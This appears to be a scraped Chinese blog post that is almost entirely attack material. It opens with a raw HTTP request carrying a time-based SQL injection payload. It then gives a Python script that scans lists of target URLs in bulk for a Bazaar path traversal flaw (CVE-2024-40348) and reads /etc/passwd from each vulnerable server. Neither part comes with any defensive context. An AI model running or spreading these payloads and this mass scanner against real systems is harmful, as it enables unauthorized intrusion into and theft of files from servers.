GET /APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1 Host:x.x.x.x User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 Connection: close
使用poc批量扫描
import urllib.request import urllib3 from urllib.parse import urljoin,quote import argparse import ssl import re # 禁用SSL证书验证,允许不安全的请求 ssl._create_default_https_context = ssl._create_unverified_context urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def read_file(file_path): # 读取文件中的URL列表 with open(file_path, 'r') as file: urls = file.read().splitlines() return urls def check(url): # 移除URL末尾的斜杠 url = url.rstrip("/") # 构造目标URL,尝试访问API文档中的敏感文件etc/passwd target = url+"/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" } try: # 发送GET请求 response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True) res = urllib.request.urlopen(response) status_code = res.getcode() content = res.read().decode() # 检查响应状态码和内容,判断是否成功读取到etc/passwd文件 if status_code == 200 and 'root:' in content and 'var' in content: print(f"\033[31mDiscovered:{url}: Bazaar_CVE-2024-40348_ArbiraryFileRead!\033[0m") return True except Exception as e: print(e) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="URL") parser.add_argument("-f", "--txt", help="file") args = parser.parse_args() url = args.url txt = args.txt if url: # 如果提供了单个URL,直接检查 check(url) elif txt: # 如果提供了包含多个URL的文件,逐个检查 urls = read_file(txt) for url in urls: check(url) else: # 如果没有提供任何参数,显示帮助信息 print("help")
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论